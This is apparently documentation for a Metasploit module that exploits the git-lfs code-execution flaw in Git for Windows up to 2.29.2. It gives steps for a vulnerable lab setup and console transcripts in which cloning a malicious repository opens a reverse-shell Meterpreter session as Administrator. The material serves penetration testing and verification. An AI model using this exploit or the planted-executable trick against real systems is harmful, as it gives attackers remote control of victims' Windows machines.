## Vulnerable Application Git in versions <= 2.29.2 includes git-lfs extension which allows remote attackers to execute arbitrary code on the victim's Windows system upon a clone operation. Attackers are able to plant a backdoor in the root directory of a malicious repository by simply adding an executable file named git.exe or any other executable extension available on the target Windows system (PATHEXT environment variable dependent). As a result, the malicious git binary will get executed automatically instead of the original git binary located in a trusted path, when the repository is cloned. ### Vulnerable Installation 1. Download a vulnerable version of Git for Windows: [v2.28.0](https://github.com/git-for-windows/git/releases/download/v2.28.0.windows.1/Git-2.28.0-64-bit.exe) 2. On the `Select Components` section of the installer, make sure Git LFS is selected (should be by default) 3. You should now be able to run the exploit and get a session on Windows ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/multi/http/git_lfs_rce` 4. Do: `run` 5. Ensure the exploit sets up a repository to be cloned, ex: `http://192.168.123.1:8080/fixflex.git` 6. From the victim machine, clone the repository created by the exploit. 7. You should get a shell. ## Scenarios ### Git `v2.28.0` on Windows 10 (2004) ``` msf > use windows/http/git_lfs_rce [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf exploit(windows/http/git_lfs_rce) > set LHOST 172.16.199.1 LHOST => 172.16.199.1 msf exploit(windows/http/git_lfs_rce) > set RHOSTS 172.16.199.151 RHOSTS => 172.16.199.151 msf exploit(windows/http/git_lfs_rce) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 172.16.199.1:4444 msf exploit(windows/http/git_lfs_rce) > [*] Using URL: http://0.0.0.0:8080/4C11tyW2NVX [*] Local IP: http://192.168.2.114:8080/4C11tyW2NVX [*] Server started. [*] Git repository to clone: http://172.16.199.1:8080/cookley.git [*] Sending payload data... [*] Sending LFS object... [*] Sending stage (200262 bytes) to 172.16.199.151 [+] Deleted .gitattributes [*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.151:50018) at 2021-09-07 12:05:55 -0400 msf exploit(windows/http/git_lfs_rce) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: DESKTOP-13BFU78\Administrator meterpreter > sysinfo Computer : DESKTOP-13BFU78 OS : Windows 10 (10.0 Build 19041). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x64/windows meterpreter > ``` ### Git `v2.32.0` on Windows 10 20H2 ``` msf > use windows/http/git_lfs_rce [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf exploit(windows/http/git_lfs_rce) > set LHOST 192.168.123.1 LHOST => 192.168.123.1 msf exploit(windows/http/git_lfs_rce) > set RHOSTS 192.168.123.150 RHOSTS => 172.16.199.151 msf exploit(windows/http/git_lfs_rce) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.123.1:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. msf exploit(windows/http/git_lfs_rce) > [*] Using URL: http://0.0.0.0:8080/15VCXHvHTOq5O [*] Local IP: http://192.168.2.114:8080/15VCXHvHTOq5O [*] Server started. [*] Git repository to clone: http://192.168.123.1:8080/fixflex.git [-] Exception handling request: The git client needs to be running on windows with a version less than 2.29.2. The client found was running on: Windows and was version: 2.32.0 ```